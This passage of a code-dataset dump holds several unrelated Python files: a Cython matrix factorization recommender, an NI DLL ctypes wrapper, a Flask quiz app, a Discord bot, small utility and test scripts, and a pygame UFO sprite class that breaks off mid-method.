self.compute_item_score = self.compute_score_MF\n\n\n if recompile_cython:\n print(\"Compiling in Cython\")\n self.runCompilationScript()\n print(\"Compilation Complete\")\n\n\n\n def compute_score_MF(self, user_id):\n\n scores_array = np.dot(self.W[user_id], self.H.T)\n\n return scores_array\n\n\n\n\n def fit(self, epochs=300, batch_size = 1000, num_factors=10,\n learning_rate = 0.01, sgd_mode='sgd', user_reg = 0.0, positive_reg = 0.0, negative_reg = 0.0,\n stop_on_validation = False, lower_validatons_allowed = 5, validation_metric = \"MAP\",\n evaluator_object = None, validation_every_n = 5):\n\n\n\n self.num_factors = num_factors\n self.sgd_mode = sgd_mode\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n\n if evaluator_object is None and stop_on_validation:\n evaluator_object = SequentialEvaluator(self.URM_validation, [5])\n\n\n # Import compiled module\n from MatrixFactorization.Cython.MatrixFactorization_Cython_Epoch import MatrixFactorization_Cython_Epoch\n\n\n if self.algorithm == \"FUNK_SVD\":\n\n\n self.cythonEpoch = MatrixFactorization_Cython_Epoch(self.URM_train,\n algorithm = self.algorithm,\n n_factors = self.num_factors,\n learning_rate = learning_rate,\n batch_size = 1,\n sgd_mode = sgd_mode,\n user_reg = user_reg,\n positive_reg = positive_reg,\n negative_reg = 0.0)\n\n elif self.algorithm == \"ASY_SVD\":\n\n\n self.cythonEpoch = MatrixFactorization_Cython_Epoch(self.URM_train,\n algorithm = self.algorithm,\n n_factors = self.num_factors,\n learning_rate = learning_rate,\n batch_size = 1,\n sgd_mode = sgd_mode,\n user_reg = user_reg,\n positive_reg = positive_reg,\n negative_reg = 0.0)\n\n elif self.algorithm == \"MF_BPR\":\n\n # Select only positive interactions\n URM_train_positive = self.URM_train.copy()\n\n URM_train_positive.data = URM_train_positive.data >= self.positive_threshold\n URM_train_positive.eliminate_zeros()\n\n assert URM_train_positive.nnz > 0, \"MatrixFactorization_Cython: URM_train_positive is empty, positive threshold is too high\"\n\n self.cythonEpoch = MatrixFactorization_Cython_Epoch(URM_train_positive,\n algorithm = self.algorithm,\n n_factors = self.num_factors,\n learning_rate=learning_rate,\n batch_size=1,\n sgd_mode = sgd_mode,\n user_reg=user_reg,\n positive_reg=positive_reg,\n negative_reg=negative_reg)\n\n\n\n\n\n\n self._train_with_early_stopping(epochs, validation_every_n, stop_on_validation,\n validation_metric, lower_validatons_allowed, evaluator_object,\n algorithm_name = self.algorithm)\n\n\n\n\n\n self.W = self.W_best\n self.H = self.H_best\n\n sys.stdout.flush()\n\n\n\n\n\n\n def _initialize_incremental_model(self):\n\n self.W_incremental = self.cythonEpoch.get_W()\n self.W_best = self.W_incremental.copy()\n\n self.H_incremental = self.cythonEpoch.get_H()\n self.H_best = self.H_incremental.copy()\n\n\n\n def _update_incremental_model(self):\n\n self.W_incremental = self.cythonEpoch.get_W()\n self.H_incremental = self.cythonEpoch.get_H()\n\n self.W = self.W_incremental\n self.H = self.H_incremental\n\n\n def _update_best_model(self):\n\n self.W_best = self.W_incremental.copy()\n self.H_best = self.H_incremental.copy()\n\n\n\n def _run_epoch(self, num_epoch):\n self.cythonEpoch.epochIteration_Cython()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n def runCompilationScript(self):\n\n # Run compile script setting the working directory to ensure the compiled file are contained in the\n # appropriate subfolder and not the project root\n\n compiledModuleSubfolder = \"/MatrixFactorization/Cython\"\n 
fileToCompile_list = ['MatrixFactorization_Cython_Epoch.pyx']\n\n        for fileToCompile in fileToCompile_list:\n\n            command = ['python',\n                       'compileCython.py',\n                       fileToCompile,\n                       'build_ext',\n                       '--inplace'\n                       ]\n\n\n            output = subprocess.check_output(' '.join(command), shell=True, cwd=os.getcwd() + compiledModuleSubfolder)\n\n            try:\n\n                command = ['cython',\n                           fileToCompile,\n                           '-a'\n                           ]\n\n                output = subprocess.check_output(' '.join(command), shell=True, cwd=os.getcwd() + compiledModuleSubfolder)\n\n            except:\n                pass\n\n\n        print(\"Compiled module saved in subfolder: {}\".format(compiledModuleSubfolder))\n\n        # Command to run compilation script\n        # python compileCython.py MatrixFactorization_Cython_Epoch.pyx build_ext --inplace\n\n        # Command to generate html report\n        # cython -a MatrixFactorization_Cython_Epoch.pyx\n\n\n\n\n\n\n    def writeCurrentConfig(self, currentEpoch, results_run, logFile):\n\n        current_config = {'learn_rate': self.learning_rate,\n                          'num_factors': self.num_factors,\n                          'batch_size': 1,\n                          'epoch': currentEpoch}\n\n        print(\"Test case: {}\\nResults {}\\n\".format(current_config, results_run))\n\n        sys.stdout.flush()\n\n        if (logFile != None):\n            logFile.write(\"Test case: {}, Results {}\\n\".format(current_config, results_run))\n            logFile.flush()\n\n\n\n\n\n\n    def saveModel(self, folder_path, file_name = None):\n\n        if file_name is None:\n            file_name = self.RECOMMENDER_NAME\n\n        print(\"{}: Saving model in file '{}'\".format(self.RECOMMENDER_NAME, folder_path + file_name))\n\n        dictionary_to_save = {\"W\": self.W,\n                              \"H\": self.H}\n\n\n        pickle.dump(dictionary_to_save,\n                    open(folder_path + file_name, \"wb\"),\n                    protocol=pickle.HIGHEST_PROTOCOL)\n\n\n        print(\"{}: Saving complete\".format(self.RECOMMENDER_NAME))\n\n\n\n\n\n\n\nclass MatrixFactorization_BPR_Cython(MatrixFactorization_Cython):\n    \"\"\"\n    Subclass allowing only for MF BPR\n    \"\"\"\n\n    RECOMMENDER_NAME = \"MatrixFactorization_BPR_Cython_Recommender\"\n\n    def __init__(self, *pos_args, **key_args):\n        super(MatrixFactorization_BPR_Cython, self).__init__(*pos_args, algorithm=\"MF_BPR\", **key_args)\n\n    def fit(self, **key_args):\n        super(MatrixFactorization_BPR_Cython, self).fit(**key_args)\n\n\n\n\n\nclass MatrixFactorization_FunkSVD_Cython(MatrixFactorization_Cython):\n    \"\"\"\n    Subclass allowing only for FunkSVD\n    \"\"\"\n\n    RECOMMENDER_NAME = \"MatrixFactorization_FunkSVD_Cython_Recommender\"\n\n    def __init__(self, *pos_args, **key_args):\n        super(MatrixFactorization_FunkSVD_Cython, self).__init__(*pos_args, algorithm=\"FUNK_SVD\", **key_args)\n\n\n    def fit(self, **key_args):\n\n        if \"reg\" in key_args:\n            key_args[\"positive_reg\"] = key_args[\"reg\"]\n            del key_args[\"reg\"]\n\n        super(MatrixFactorization_FunkSVD_Cython, self).fit(**key_args)\n\n\n\n\nclass MatrixFactorization_AsySVD_Cython(MatrixFactorization_Cython):\n    \"\"\"\n    Subclass allowing only for AsySVD\n    \"\"\"\n\n    RECOMMENDER_NAME = \"MatrixFactorization_AsySVD_Cython_Recommender\"\n\n    def __init__(self, *pos_args, **key_args):\n        super(MatrixFactorization_AsySVD_Cython, self).__init__(*pos_args, algorithm=\"ASY_SVD\", **key_args)\n\n    def fit(self, **key_args):\n        super(MatrixFactorization_AsySVD_Cython, self).fit(**key_args)\n","repo_name":"vittorio96/RecSys","sub_path":"MatrixFactorization/Cython/MatrixFactorization_Cython.py","file_name":"MatrixFactorization_Cython.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"29860466734","text":"import openpyxl\n\ndef create_new_sheet(workbook, filename, 
class MatrixFactorization_BPR_Cython(MatrixFactorization_Cython):\n \"\"\"\n Subclass allowing only for MF BPR\n \"\"\"\n\n RECOMMENDER_NAME = \"MatrixFactorization_BPR_Cython_Recommender\"\n\n def __init__(self, *pos_args, **key_args):\n super(MatrixFactorization_BPR_Cython, self).__init__(*pos_args, algorithm=\"MF_BPR\", **key_args)\n\n def fit(self, **key_args):\n super(MatrixFactorization_BPR_Cython, self).fit(**key_args)\n\n\nclass MatrixFactorization_FunkSVD_Cython(MatrixFactorization_Cython):\n \"\"\"\n Subclass allowing only for FunkSVD\n \"\"\"\n\n RECOMMENDER_NAME = \"MatrixFactorization_FunkSVD_Cython_Recommender\"\n\n def __init__(self, *pos_args, **key_args):\n super(MatrixFactorization_FunkSVD_Cython, self).__init__(*pos_args, algorithm=\"FUNK_SVD\", **key_args)\n\n def fit(self, **key_args):\n\n if \"reg\" in key_args:\n key_args[\"positive_reg\"] = key_args[\"reg\"]\n del key_args[\"reg\"]\n\n super(MatrixFactorization_FunkSVD_Cython, self).fit(**key_args)\n\n\nclass MatrixFactorization_AsySVD_Cython(MatrixFactorization_Cython):\n \"\"\"\n Subclass allowing only for AsySVD\n \"\"\"\n\n RECOMMENDER_NAME = \"MatrixFactorization_AsySVD_Cython_Recommender\"\n\n def __init__(self, *pos_args, **key_args):\n super(MatrixFactorization_AsySVD_Cython, self).__init__(*pos_args, algorithm=\"ASY_SVD\", **key_args)\n\n def fit(self, **key_args):\n super(MatrixFactorization_AsySVD_Cython, self).fit(**key_args)\n","repo_name":"vittorio96/RecSys","sub_path":"MatrixFactorization/Cython/MatrixFactorization_Cython.py","file_name":"MatrixFactorization_Cython.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"29860466734","text":"import openpyxl\n\ndef create_new_sheet(workbook, filename, sheet_name):\n\n # Create a new sheet with the specified name\n workbook.create_sheet(title=sheet_name)\n\n # Save the workbook to the specified filename\n workbook.save(filename)\n\nif __name__ == \"__main__\":\n filename = \"Hasil/Hasil.xlsx\" # Replace with the desired filename\n sheet_1 = \"Normal\"\n sheet_2 = \"Autis\" # Replace with the desired sheet name\n \n # Create a new Excel workbook\n workbook = openpyxl.Workbook()\n # Remove the default sheet created by openpyxl (Sheet)\n default_sheet = workbook.active\n workbook.remove(default_sheet)\n\n create_new_sheet(workbook, filename, sheet_1)\n create_new_sheet(workbook, filename, sheet_2)\n","repo_name":"RobyRAX/Pupil_Detection","sub_path":"InitiateFile.py","file_name":"InitiateFile.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13001472861","text":"\"\"\"\nThis module has some convenience classes and functions for wrapping NI C API\ncalls. Modeled after the DLL calls in the NIMI-python library, see e.g.\nhttps://github.com/ni/nimi-python/blob/master/generated/nitclk/nitclk/_library.py\n\"\"\"\n\nimport ctypes\nfrom ctypes import POINTER\nfrom typing import NamedTuple, Optional, List, Any, Callable\nimport warnings\nfrom dataclasses import dataclass\nfrom .visa_types import (\n ViChar, ViStatus, ViRsrc, ViInt32, ViString, ViSession, ViBoolean, ViAttr,\n ViReal64, VI_NULL\n)\n\n# 256 bytes should be enough, according to the documentation\nSTRING_BUFFER_SIZE = 257\n\n\ndef c_str(s: str) -> bytes: return bytes(s, \"ascii\")\n\n\n@dataclass\nclass AttributeWrapper(object):\n \"\"\"\n Struct to associate a data type to a numeric constant (i.e. attribute)\n defined in a NI DLL library. ``dtype`` should be one of the types defined\n in the ``visa_types`` module. Here, ``value`` means the same as the\n attributeID in the DLL documentation.\n \"\"\"\n value: ViAttr\n dtype: Any\n\n\nclass NamedArgType(NamedTuple):\n \"\"\"\n Struct for associating a name with an argument type for DLL function\n signatures.\n \"\"\"\n name: str\n argtype: Any\n\n\nclass NIDLLWrapper(object):\n \"\"\"\n This class provides convenience functions for wrapping and checking a DLL\n function call, as well as some premade pythonic wrapper functions for\n common library functions such as libName_error_message, libName_init/close\n and libName_GetAttribute (e.g. niRFSG_init or niSync_init). Other functions\n should be wrapped by a library-specific class by calling\n ``wrap_dll_function_checked``. See the NI_RFSG driver for a concrete\n example.\n\n Args:\n dll_path: path to the DLL file containing the library\n lib_prefix: All function names in the library start with this. For\n example, for NI-RFSG, where function names are of the form\n niRFSG_FunctionName, ``lib_prefix`` should be 'niRFSG'.\n \"\"\"\n\n 
def __init__(self, dll_path: str, lib_prefix: str):\n self._dll = ctypes.cdll.LoadLibrary(dll_path)\n self._lib_prefix = lib_prefix\n\n self._dtype_map = {\n ViBoolean: \"ViBoolean\",\n ViInt32: \"ViInt32\",\n ViReal64: \"ViReal64\",\n ViString: \"ViString\"\n }\n\n # wrap standard functions that are the same in all libraries\n\n # note: self.error_message is a convenience wrapper around this, with\n # a different signature\n self._error_message = self.wrap_dll_function(\n name_in_library=\"error_message\",\n argtypes=[\n NamedArgType(\"vi\", ViSession),\n NamedArgType(\"errorCode\", ViStatus),\n NamedArgType(\"errorMessage\", POINTER(ViChar)),\n ]\n )\n\n # this is wrapped in self.init with a different signature\n self._init = self.wrap_dll_function_checked(\n name_in_library=\"init\",\n argtypes=[\n NamedArgType(\"resourceName\", ViRsrc),\n NamedArgType(\"idQuery\", ViBoolean),\n NamedArgType(\"resetDevice\", ViBoolean),\n ]\n )\n\n # no special name is needed, the signature is the same\n self.reset = self.wrap_dll_function_checked(\n name_in_library=\"reset\",\n argtypes=[NamedArgType(\"vi\", ViSession)]\n )\n\n self.close = self.wrap_dll_function_checked(\n name_in_library=\"close\",\n argtypes=[NamedArgType(\"vi\", ViSession)]\n )\n\n # wrap GetAttribute functions (see get_attribute method)\n for dtype, dtype_name in self._dtype_map.items():\n\n # argtypes for the GetAttribute functions\n getter_argtypes = [\n NamedArgType(\"vi\", ViSession),\n NamedArgType(\"channelName\", ViString),\n NamedArgType(\"attributeID\", ViAttr),\n NamedArgType(\"attributeValue\", POINTER(dtype))\n ]\n\n # the argtypes for the corresponding SetAttribute\n # functions. note that the signature for SetAttributeViString is\n # the same as for the other types even though GetAttributeViString\n # has a unique signature\n setter_argtypes = getter_argtypes.copy()\n\n if dtype == ViString:\n # replace last argument\n getter_argtypes.pop()\n getter_argtypes.append(NamedArgType(\"bufferSize\", ViInt32))\n # ViString is already a pointer, so no POINTER() here\n getter_argtypes.append(NamedArgType(\"attributeValue\", dtype))\n\n getter_name = f\"GetAttribute{dtype_name}\"\n getter_func = self.wrap_dll_function_checked(\n getter_name,\n argtypes=getter_argtypes)\n setattr(self, getter_name, getter_func)\n\n setter_argtypes[-1] = NamedArgType(\"attributeValue\", dtype)\n\n setter_name = f\"SetAttribute{dtype_name}\"\n setter_func = self.wrap_dll_function_checked(\n setter_name,\n argtypes=setter_argtypes)\n setattr(self, setter_name, setter_func)\n\n 
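# After the wrapping loop above, the instance exposes one\n # GetAttribute<DataType>/SetAttribute<DataType> method pair per _dtype_map\n # entry (e.g. GetAttributeViReal64), installed via setattr.\n\n 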
def wrap_dll_function(self, name_in_library: str,\n argtypes: List[NamedArgType],\n restype: Any = ViStatus,\n ) -> Any:\n \"\"\"\n Convenience method for wrapping a function in a NI C API.\n\n Args:\n name_in_library: The name of the function in the library (e.g.\n \"niRFSG_init\", or without the prefix, just \"init\")\n argtypes: list of ``NamedArgType`` tuples containing the names and\n types of the arguments of the function to be wrapped.\n restype: The return type of the library function (most likely\n ``ViStatus``).\n \"\"\"\n\n if not name_in_library.startswith(self._lib_prefix):\n name_in_library = f\"{self._lib_prefix}_{name_in_library}\"\n\n # TODO( mgunyho ): thread lock? (see nimi-python link at top of file)\n func = getattr(self._dll, name_in_library)\n func.restype = restype\n func.argtypes = [a.argtype for a in argtypes]\n func.argnames = [a.name for a in argtypes] # just in case\n\n return func\n\n def _check_error(self, error_code: int):\n \"\"\"\n If the error code is nonzero, convert it to a string using\n ``self.error_message`` and raise an exception or issue a warning as\n appropriate. ``self.error_message`` must be initialized with\n ``wrap_dll_function`` before this method can be used.\n \"\"\"\n if error_code != 0:\n msg = self.error_message(error_code=ViStatus(error_code))\n if error_code < 0:\n # negative error codes are errors\n raise RuntimeError(f\"({error_code}) {msg}\")\n else:\n warnings.warn(f\"({error_code}) {msg}\", RuntimeWarning,\n stacklevel=3)\n\n def wrap_dll_function_checked(self, name_in_library: str,\n argtypes: List[NamedArgType]) -> Callable:\n \"\"\"\n Same as ``wrap_dll_function``, but check the return value and convert\n it to a Python exception or warning if it is nonzero using\n ``self._check_error``. The arguments are the same as for\n ``wrap_dll_function``, except that ``restype`` is always ``ViStatus``.\n \"\"\"\n\n func = self.wrap_dll_function(\n name_in_library=name_in_library,\n argtypes=argtypes,\n restype=ViStatus,\n )\n\n # see https://docs.python.org/3/library/ctypes.html#return-types\n func.restype = self._check_error\n\n return func\n\n def init(self, resource: str, id_query: bool = True,\n reset_device: bool = False) -> ViSession:\n \"\"\"\n Convenience wrapper around libName_init (e.g. niRFSG_init). Returns the\n ViSession handle of the initialized session. The wrapped version of the\n actual DLL function is registered as self._init, see __init__. Note\n that this class is not responsible for storing the handle, it should\n be managed by the function or class that calls the functions wrapped by\n this class.\n\n Args:\n resource: the resource name of the device to initialize, as given\n by NI MAX.\n id_query: whether to perform an ID query on initialization\n reset_device: whether to reset the device during initialization\n Returns:\n the ViSession handle of the initialized device\n \"\"\"\n session = ViSession()\n self._init(ViRsrc(c_str(resource)), id_query, reset_device,\n ctypes.byref(session))\n return session\n\n def get_attribute(self, session: ViSession, attr: AttributeWrapper) -> Any:\n \"\"\"\n Get an attribute with data type \"DataType\" by calling the appropriate\n \"libName_GetAttribute\" function (for example\n niRFSG_GetAttributeViReal64 when ``lib_prefix`` is \"niRFSG\" and\n ``attr.dtype`` is ``ViReal64``).\n\n NOTE: channels are not implemented.\n \"\"\"\n dtype = attr.dtype\n if dtype not in self._dtype_map:\n raise ValueError(f\"get_attribute() not implemented for {dtype}\")\n\n dtype_name = self._dtype_map[dtype]\n func = getattr(self, f\"GetAttribute{dtype_name}\")\n\n if dtype == ViString:\n res = ctypes.create_string_buffer(STRING_BUFFER_SIZE)\n func(session, b\"\", attr.value, STRING_BUFFER_SIZE, res)\n ret: Any = res.value.decode()\n else:\n res = dtype()\n func(session, b\"\", attr.value, ctypes.byref(res))\n ret = res.value\n\n return ret\n\n 
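# Example (sketch): the DLL name and the numeric attribute ID below are\n # placeholders -- real values come from the vendor's driver and header files:\n #\n # wrapper = NIDLLWrapper(dll_path=\"niRFSG_64.dll\", lib_prefix=\"niRFSG\")\n # session = wrapper.init(\"PXI1Slot2\")\n # value = wrapper.get_attribute(session, AttributeWrapper(ViAttr(1150001), ViReal64))\n\n 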
def set_attribute(self, session: ViSession, attr: AttributeWrapper,\n set_value: Any) -> Any:\n \"\"\"\n Set an attribute with data type \"DataType\" by calling the appropriate\n \"libName_SetAttribute\" function (for example\n niRFSG_SetAttributeViReal64 when ``lib_prefix`` is \"niRFSG\" and\n ``attr.dtype`` is ``ViReal64``).\n\n NOTE: channels are not implemented.\n \"\"\"\n dtype = attr.dtype\n if dtype not in self._dtype_map:\n raise ValueError(f\"set_attribute() not implemented for {dtype}\")\n\n dtype_name = self._dtype_map[dtype]\n func = getattr(self, f\"SetAttribute{dtype_name}\")\n\n if dtype == ViString:\n res = ctypes.create_string_buffer(STRING_BUFFER_SIZE)\n func(session, b\"\", attr.value, c_str(set_value), res)\n ret = res.value.decode()\n else:\n # non-string setters take the value directly and return nothing useful\n func(session, b\"\", attr.value, set_value)\n ret = None\n\n return ret\n\n def error_message(self, session: Optional[ViSession] = None,\n error_code: ViStatus = ViStatus(0)) -> str:\n \"\"\"\n Convenience wrapper around libName_error_message (which is wrapped as\n self._error_message).\n \"\"\"\n buf = ctypes.create_string_buffer(STRING_BUFFER_SIZE)\n self._error_message(session or VI_NULL, error_code, buf)\n return buf.value.decode()\n","repo_name":"QCoDeS/Qcodes_contrib_drivers","sub_path":"qcodes_contrib_drivers/drivers/NationalInstruments/dll_wrapper.py","file_name":"dll_wrapper.py","file_ext":"py","file_size_in_byte":11449,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"35"} +{"seq_id":"12629900470","text":"import math\nimport pytest\nfrom pathlib import Path\nfrom papadimitriou import papadimitriou, reduce_clauses, read_input, read_output\n\n\npath = Path(r\"C:\\Python\\Stanford Algorithms Problem Sets\\Test_Cases\\stanford-algs\\testCases\\course4\\assignment4TwoSat\").glob('**/*')\nfiles = [x for x in path if x.is_file()]\n\ninput_files = [file for file in files if \"input\" in file.name]\noutput_files = [file for file in files if \"output\" in file.name]\n\ntest_cases = []\nfor i, _ in enumerate(input_files):\n clauses = read_input(input_files[i])\n expected = read_output(output_files[i])\n test_case = (clauses, expected)\n test_cases.append(test_case)\n\n\n@pytest.mark.parametrize('clauses, expected', test_cases)\ndef test_papadimitriou(clauses, expected):\n reduced_clauses = reduce_clauses(clauses)\n actual = papadimitriou(reduced_clauses)\n\n assert(expected == actual)\n\n\nif __name__ == '__main__':\n clauses, expected = test_cases[21]\n test_papadimitriou(clauses, expected)","repo_name":"TimKindervatter/Algorithms-Design-and-Analysis","sub_path":"14-2SAT/test_papadimitriou.py","file_name":"test_papadimitriou.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36315813177","text":"import hello\n\n\ndef test_hello_prints_correct_result(capfd, monkeypatch):\n monkeypatch.setattr('builtins.input', lambda _: \"Chuck\")\n hello.hello()\n\n out, err = capfd.readouterr()\n print(out)\n assert out == 'Hello Chuck\\n'\n","repo_name":"ichbinryan/PY4E-Mod022Asgmt-Howdy","sub_path":"test_Program.py","file_name":"test_Program.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19333953354","text":"from flask import Flask, render_template, request\nfrom helpers import favorite, delist, User\n\napp: Flask = Flask(__name__)\n\nflavor_dict: dict[str, int] = {\"Sweet\": 0, \"Sour\": 0, \"Spicy\": 0, \"Salty\": 0}\nfav_flavs: str = \"\"\n\nuser_number: int = 0\nusers: list[User] = []\n\n
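# Each quiz page POSTs an \"image-pick\" value naming a flavor; the handlers\n# below tally the picks in flavor_dict so /results can compute the favorite(s)\n# via helpers.favorite().\n\n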
render_template(\"quizpg1.html\")\n\n@app.route('/quizpg2', methods=[\"GET\", \"POST\"])\ndef quizpg2():\n if request.method == \"POST\":\n global flavor_dict \n flavor = (request.form[\"image-pick\"])\n flavor_dict[flavor] += 1\n return render_template(\"quizpg2.html\")\n\n@app.route('/quizpg3', methods=[\"GET\", \"POST\"])\ndef quizpg3():\n if request.method == \"POST\":\n global flavor_dict\n flavor = (request.form[\"image-pick\"])\n flavor_dict[flavor] += 1\n return render_template(\"quizpg3.html\")\n\n@app.route('/quizpg4', methods=[\"GET\", \"POST\"])\ndef quizpg4():\n if request.method == \"POST\":\n global flavor_dict\n flavor = (request.form[\"image-pick\"]) \n flavor_dict[flavor] += 1\n return render_template(\"quizpg4.html\")\n\n@app.route('/results', methods=[\"GET\", \"POST\"])\ndef results():\n global fav_flavs, flavor_dict, user_number, users\n if request.method == \"POST\":\n global flavor_dict \n flavor = (request.form[\"image-pick\"])\n flavor_dict[flavor] += 1\n fav = favorite(flavor_dict)\n fav_flavs = delist(fav)\n user_number += 1\n new_user: User =User(user_number, fav_flavs)\n users.append(new_user)\n flavor_dict = {\"Sweet\": 0, \"Sour\": 0, \"Spicy\": 0, \"Salty\": 0}\n return render_template(\"results.html\", fav_flavs=fav_flavs)\n\n\n@app.route('/all_results')\ndef all_results():\n return render_template(\"all_results.html\", users=users)\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"tsaiyi0/quiz","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24712325898","text":"a = int(input(\"Enter Customer ID : \"))\nb = input(\"Enter the name of the customer : \")\nc = int(input(\"Enter the litres consumed by the customer : \"))\nif c <= 199:\n s = c * 3\nelif 200 <= c < 400:\n s = c * 3.35\nelif 400 <= c < 600:\n s = c * 4.80\nelse:\n s = c * 5.10\nif s > 1250:\n s = s + (15/100 * s)\nprint(a)\nprint(b)\nprint(c)\nprint(int(s))\n","repo_name":"Codechef-SRM-NCR-Chapter/Code-Genesis","sub_path":"answers/VrishtiSharma/Conditonals/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"72292146661","text":"from email.policy import default\nfrom http import client\nimport discord\nfrom dotenv import load_dotenv\nimport os\nimport random\n\ndefault_intents = discord.Intents.default()\ndefault_intents.members = True #activer les intents relatifs aux membres\nclient = discord.Client(intents = default_intents)\n\nload_dotenv(dotenv_path=\"config\")\ntoken = os.getenv(\"token\")\n\nclass DocBot(discord.Client):\n \n @client.event\n async def on_ready(self):\n print (\"Amrane's bot connected...\")\n\n #reponse à un message\n @client.event\n async def on_message(self, message):\n if message.content == \"Ping\" or message.content ==\"ping\":\n await message.channel.send(\"Pong\")\n elif message.content == \"bonjour\" or message.content == \"Bonjour\":\n await message.channel.send(\"salut\") #attention faut pas mettre la meme chaine que dans le if\n\n elif message.content.startswith(\"!del\"):\n number = int(message.content.split()[1])\n messages = await message.channel.history(limit=number + 1).flatten() #historique des messages postés\n for each_message in messages:\n await each_message.delete()\n \n elif message.content.startswith(\"!help\"):\n await message.channel.send(\"!del -chiffre- : ca vous 
elif message.content.startswith(\"!help\"):\n await message.channel.send(\"!del <n>: deletes the last n messages\\n !help: shows the commands you can use \\n !random (n1 n2): generates a random number between the two numbers you give \\n !play <n>: guess the number the bot has in mind\")\n \n elif message.content.startswith(\"!random\"):\n a = int(message.content.split()[1])\n b = int(message.content.split()[2])\n x = random.randrange(a, b)\n await message.channel.send(x)\n\n\n elif message.content.startswith(\"!play\"):\n # NOTE: the original code prompted for a guess and then parsed the\n # \"!play\" message itself, which always raised ValueError; the guess\n # is now read from the command arguments instead (e.g. \"!play 7\").\n number = random.randint(1,10)\n try:\n guess = int(message.content.split()[1])\n except (IndexError, ValueError):\n await message.channel.send('Usage: !play <number between 1 and 10>')\n return\n await message.channel.send('I have a number in mind between 1 and 10')\n #await message.channel.send(number)\n if guess == number:\n await message.channel.send('You got it!')\n else:\n await message.channel.send(\"you lose\")\n\n #***************************************************** \n\n #a new member joins\n\n @client.event\n async def on_member_join(self, member):\n general_channel: discord.TextChannel = client.get_channel(958699791393632276)\n await general_channel.send(content=f\"welcome to the server {member.display_name} \")\n \n\nclient = DocBot()\nclient.run(token)\n\n\n","repo_name":"amrane97/TP3","sub_path":"TP4/DocBot.py","file_name":"DocBot.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36489175578","text":"import pygame\n\nfrom time import time\nfrom random import randint\n# Import the settings\nimport settings\n\n\nclass UFO(pygame.sprite.Sprite):\n \"\"\"\n Base class for spaceships.\n\n Attributes\n ----------\n src : image\n The image of the object\n image : pygame.Surface\n The surface of the object\n rect : pygame.Surface().get_rect\n The rectangle of the object\n damage_sound : pygame.mixer.Sound\n The sound when the object is hit by Bullet\n destroyed_sound : pygame.mixer.Sound\n The sound when the object health points reach 0\n lose_hp_sound : pygame.mixer.Sound\n The sound when the player loses hp\n center : tuple\n Integers representing the position of the center of the object\n index : int\n Integer to keep track of the current explosion image\n explosion_sprites : list\n Images of explosion\n speed : int\n The speed of the object\n health : int\n The health of the object\n strafe : bool\n True/False, allows the object to randomly change its position on the x-axis\n cooldown : float\n The amount of time to wait between strafes\n timer : float\n The time when the object was created\n chance_to_strafe : int\n The chance of the object to strafe\n direction : bool\n The direction of the strafe\n\n Methods\n -------\n strafing()\n Randomly changes the position of the object on the x-axis\n explode()\n Displays an explosion animation\n update(screen)\n Updates the object\n \"\"\"\n def __init__(self, pos_x, pos_y, face, w, h):\n \"\"\"\n Parameters\n ----------\n pos_x : int\n The position on the x-axis\n pos_y : int\n The position on the y-axis\n face : str\n Path to the image of the object\n w : int\n Width of the object\n h : int\n Height of the object\n \"\"\"\n super().__init__()\n\n self.src = pygame.image.load(face).convert_alpha()\n self.image = pygame.Surface((w, h)).convert_alpha()\n pygame.transform.scale(self.src.convert_alpha(), (w, h), self.image)\n self.rect = self.image.get_rect(center=(pos_x, pos_y))\n\n self.damage_sound = pygame.mixer.Sound(settings.SOUNDS[\"hit\"])\n self.destroyed_sound = pygame.mixer.Sound(settings.SOUNDS[\"enemy_destroyed\"])\n self.lose_hp_sound = pygame.mixer.Sound(settings.SOUNDS[\"lose_hp\"])\n 
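# pygame Sound volumes range from 0.0 to 1.0, so this plays the hp-loss cue at half volume\n 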
self.lose_hp_sound.set_volume(0.5)\n\n self.center = None\n\n self.index = 0\n self.explosion_sprites = []\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_1.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_2.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_3.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_4.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_5.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_6.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_7.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_8.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_9.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_10.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_11.png\"))\n\n self.speed = 1\n self.health = 1\n\n self.strafe = False\n self.cooldown = 1.75\n self.timer = time()\n self.chance_to_strafe = 25\n self.direction = randint(0, 1)\n\n def strafing(self) -> None:\n \"\"\"\n Randomly changes the position of the object on the x-axis.\n \"\"\"\n # Check if the object can strafe and it's alive\n if self.strafe and self.health > 0:\n # Check if enough time has passed and try to strafe\n if time() - self.timer > self.cooldown and randint(0, 100) < self.chance_to_strafe:\n # Get the strafe 